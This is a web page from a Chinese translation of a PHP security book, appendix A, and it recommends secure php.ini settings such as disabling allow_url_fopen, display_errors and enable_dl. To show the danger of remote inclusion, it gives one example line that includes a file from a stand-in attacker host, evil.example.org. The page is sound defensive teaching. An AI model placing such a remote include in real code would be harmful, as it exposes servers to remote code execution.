<table width="100%" border="0" cellspacing="0" cellpadding="5" bgcolor="#649CCC"><tr valign="middle"><td align="left"> <p class="p_Heading1"><span class="f_Heading1">附录 A. 配置选项</span></p> </td> <td align="right"> <span style="font-size: 9pt"> <a href="introduction.htm">Top</a> <a href="new_item52.htm">Previous</a> <a href="new_item54.htm">Next</a> </span> </td> </tr></table>
<table width="100%" border="0" cellspacing="0" cellpadding="5"><tr valign="top"><td align="left"><p style="line-height: 2.0;">附录 A. 配置选项</p><p style="line-height: 2.0;"> 尽管本书的焦点是在于应用的安全性,但有一些配置选项是任何关心安全的开发者必需熟悉的。PHP的配置会影响你所写代码的行为以及你使用的技巧,必要时你需要稍稍负责一下应用程序以外的东西。</p><p style="line-height: 2.0;"> PHP的配置主要由一个名为php.ini的文件所指定。该文件包含很多配置选项,每一项都会对PHP产生非常特定的影响。如果该文件不存在,或者该文件中的某选项不存在,则会使用默认值。</p><p style="line-height: 2.0;"> 如果你不知道php.ini文件所在的位置,你可以使用phpinfo( )来确定PHP中对该文件路径的定义:</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> <?php</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> phpinfo();</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> ?></p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> 图A-1 所示的第六行(配置文件(php.ini)路径)显示了php.ini的完整路径。如果只显示了路径(没有文件名),这就意味着PHP无法在所示路径找到php.ini文件。</p><p style="line-height: 2.0;"> 该文件包含的自身说明非常好,因此你可以阅读该文件并选择适合你的配置选项。而手册更是详细,所以在你需要某一选项的更多信息时,我推荐访问http://php.net/manual/ini.php</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">图A-1. phpinfo( ) 函数可用于php.ini文件的定位</p><p style="text-align: justify; line-height: 2.0;"><img src="image/57739179b46f9.png" width="550" height="412" vspace="1" hspace="1" border="0" alt=""/></p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.1. allow_url_fopen</p><p style="line-height: 2.0;"> 正如第六章所示,allow_url_fopen选项允许你如同本地文件一样引用远程资源:</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"><?php</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> $contents = file_get_contents('http://example.org/xss.html');</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> ?></p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> 在第五章中揭示了当它与include或require相结合时的危险性:</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> <?php</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> include 'http://evil.example.org/evil.inc';</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> ?></p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> 我推荐关闭allow_url_fopen选项,除非你的应用需要它。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.2. disable_functions</p><p style="line-height: 2.0;"> disable_functions选项是非常有用的,它可以确保一些有潜在威胁的函数不能被使用。尽管可以建立规范去禁止使用这些函数,但在PHP配置中进行限制要比依赖于开发者对规范的遵循要可靠得多。</p><p style="line-height: 2.0;"> 我建立对附录B列出的函数进行检查,看一下是否要对一些函数进行限制。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.3. display_errors</p><p style="line-height: 2.0;"> PHP的错误报告可以帮助你发现你所写代码中的错误。当你开发应用时,把错误提示显示出来是取得即时反馈的有效方法,同时也可以加快开发速度。</p><p style="line-height: 2.0;"> 在一个产品级的应用中,这一行为会成为一项安全风险。如果它显示错误信息,所有人就可以得知你的应用中的重要信息。</p><p style="line-height: 2.0;"> 在产品中你需要关闭display_errors选项。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.4. enable_dl</p><p style="line-height: 2.0;"> enable_dl选项用于控制dl()函数是否生效,该函数允许在运行时加载PHP扩展。</p><p style="line-height: 2.0;"> 使用dl()函数可能导致攻击者绕过open_basedir限制,因此除非有必要,你必须在你的应用中禁止它。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.5. error_reporting</p><p style="line-height: 2.0;"> 很多安全漏洞是由于使用了未初始化的变量或其它随意的编程方法引起的。通过把PHP的error_reporting选项置为E_ALL 或 E_ALL | E_STRICT,PHP就会对上述行为进行提示。这些设置都为报告Notice级别的错误。</p><p style="line-height: 2.0;"> 我建议把error_reporting至少设定为E_ALL。(译注:在开发中)</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.6. file_uploads</p><p style="line-height: 2.0;"> file_uploads选项决定了是否允许上传文件。因此,如果你的应用不需要用户上传文件,那么关闭该选项就是最好的选择。</p><p style="line-height: 2.0;"> 只是简单地在PHP代码中不对上传文件进行处理是不够的,因为在执行你的代码前,PHP就做了一些工作(如根据相关部据生成$_FILES数组)。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.7. log_errors</p><p style="line-height: 2.0;"> 当log_errors设为有效时,PHP会向error_log配置选项指定的文件中写入所有出错信息。</p><p style="line-height: 2.0;"> 当display_errors设为无效时,将log_errors设为有效是很重要的;否则你将无法看到睛出错信息。</p><p style="line-height: 2.0;"> 我建议将log_errors设为有效并在error_log设定日志文件所在位置。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.8. magic_quotes_gpc</p><p style="line-height: 2.0;"> magic_quotes_gpc是一个常用的选项,它目的是防止SQL注入。但出于很多原因,包括它转义输入的方式,证明了它是不完善的。</p><p style="line-height: 2.0;"> 它对$_GET, $_POST, 以及 $_COOKIE中的数据使用同样的规则即addslashes( )函数进行处理。从而,它并没有根据你的数据库选用对应的转义函数进行处理。</p><p style="line-height: 2.0;"> 基于两个主要的原因,你需要把get_magic_quotes_gpc设为无效:</p><p style="line-height: 2.0;"> 首先,它会加大你的输入过滤逻辑的复杂性,这是由于它在执行你的代码前首先对数据进行了编辑。例如,你需要对输入的姓名进行过滤,其逻辑是只允许字母、空格、连词符以及单引号,当magic_quotes_gpc生效时,你必须适应形如O\'Reilly的姓名或者使用stripslashes( )尝试将它恢复原形。这一不必要的复杂性(或者说不严谨的过滤规则)加大了发生错误的可能性,同时,你的输入过滤机制中的缺陷必然会导致安全漏洞。</p><p style="line-height: 2.0;"> 其次,它并没有根据你的数据库选用对应的转义函数进行处理。这样,由于它可以抵挡一些低层次或偶发的攻击,掩盖了它是一个糟糕的过滤或转义机制这个事实,从而留下了一个安全漏洞,使你的应用无法抵挡如针对字符集的攻击等更复杂的攻击手段。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.9. memory_limit</p><p style="line-height: 2.0;"> 为防止写得糟糕的脚本占用所有的可用内存,可以使用memory_limit选项对最大内存使用量进行限制(以字节方式或缩写方式如8M指定)。</p><p style="line-height: 2.0;"> 尽管最佳的取值是与运行的应用是相关的,我还是建议在大多情况下使用默认值8M。</p><p style="line-height: 2.0;"> memory_limit选项只有在PHP指定了enable-memory-limit方式编译时才会生效。</p><p style="line-height: 2.0;">A.10. open_basedir</p><p style="line-height: 2.0;">open_basedir选项会限制PHP只能在它指定的目录中打开文件。尽管它不能取代正确的输入过滤,但该选项能减少利用文件系统相关函数如include及require进行的攻击。</p><p style="line-height: 2.0;"> 该选项的值会被当做前缀使用,因此当你想表示指定目录时请小心不要漏了最后的斜杠:</p><p style="line-height: 2.0;"> open_basedir = /path/to/</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"><span style="font-weight: bold;">小提示</span></p><p style="line-height: 2.0;">请确认enable_dl选项是关闭的,否则open_basedir的限制可能会被绕过。</p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;">A.11. register_globals</p><p style="line-height: 2.0;">见第二章</p><p style="line-height: 2.0;">A.12. safe_mode</p><p style="line-height: 2.0;">见第八章</p><p style="text-align: justify; line-height: 2.0;"><img src="image/57739179b97ef.png" width="550" height="412" vspace="1" hspace="1" border="0" alt=""/></p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> </p><p style="line-height: 2.0;"> </p><hr noshade="noshade" size="1"/><p style="line-height: 2.0;"> </p></td></tr></table>
- 第一章 简介
- 1.1.PHP功能
- 1.1.1. 全局变量注册
- 1.1.2. 错误报告
- 1.2.原则
- 1.2.1. 深度防范
- 1.2.2. 最小权限
- 1.2.3. 简单就是美
- 1.2.4. 暴露最小化
- 1.3. 方法
- 1.3.1. 平衡风险与可用性
- 1.3.2. 跟踪数据
- 1.3.3. 过滤输入
- 1.3.4. 输出转义
- 第二章 表单及URL
- 2.1. 表单与数据
- 2.2. 语义URL攻击
- 2.3. 文件上传攻击
- 2.4. 跨站脚本攻击
- 2.5. 跨站请求伪造
- 2.6. 欺骗表单提交
- 2.7. HTTP请求欺骗
- 第三章 数据库及SQL
- 3.1. 访问权限暴露
- 3.2. SQL 注入
- 3.3. 数据的暴露
- 第四章 会话与 Cookies
- 4.1. Cookie 盗窃
- 4.2. 会话数据暴露
- 4.3. 会话固定
- 4.4. 会话劫持
- 第五章 包含
- 5.1. 源码暴露
- 5.2. 后门URL
- 5.3. 文件名操纵
- 5.4. 代码注入
- 第六章 文件与命令
- 6.1. 文件系统跨越
- 6.2. 远程文件风险
- 6.3. 命令注入
- 第七章 验证与授权
- 7.1. 暴力攻击
- 7.2. 密码嗅探
- 7.3. 重播攻击
- 7.4. 永久登录
- 第八章 共享主机
- 8.1. 源码暴露
- 8.2. 会话数据暴露
- 8.3. 会话注入
- 8.4. 文件系统浏览
- 8.5. 安全模式
- 附录 A. 配置选项
- 附录B. 函数
- 附录C. 加密